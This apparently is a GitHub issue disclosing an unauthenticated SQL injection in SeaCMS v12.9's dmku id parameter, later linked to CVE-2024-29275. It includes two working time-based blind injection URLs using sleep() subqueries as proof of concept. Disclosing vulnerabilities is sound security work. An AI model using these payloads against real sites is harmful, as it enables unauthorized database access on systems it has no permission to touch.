CMS icon indicating copy to clipboard operation
CMS copied to clipboard
Published 4 months ago verified publisher icon seacms-net

Unauthenticated SQL Injection in SeaCMS v12.9

Open Hebing123 opened this issue 1 year ago • 1 comments

Summary

SeaCMS v12.9 suffers from an unauthenticated SQL injection vulnerability in the dmku/index.php file where user-supplied data is used directly in an SQL query without proper sanitization.

Detail

The following code demonstrates the misuse of the id parameter: https://github.com/HuaQiPro/seacms/blob/ffa00178c7bf966b6bed7109ca76c270eadfeb70/js/player/dmplayer/dmku/class/mysqli.class.php#L287-L305 image It is clearly spliced directly into the SQL statement without filtering. image

Proof of Concept (PoC)

http(s)://ip:port//js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(10)))v)&type=list image http(s)://ip:port//js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(15)))v)&type=list image

Impact

This vulnerability allows unauthenticated remote attackers to inject arbitrary SQL commands through the id parameter.

Hebing123 avatar Mar 12 '24 07:03 Hebing123

This is the vulnerability exploitation reference for CVE-2024-29275

Hebing123 avatar May 10 '24 09:05 Hebing123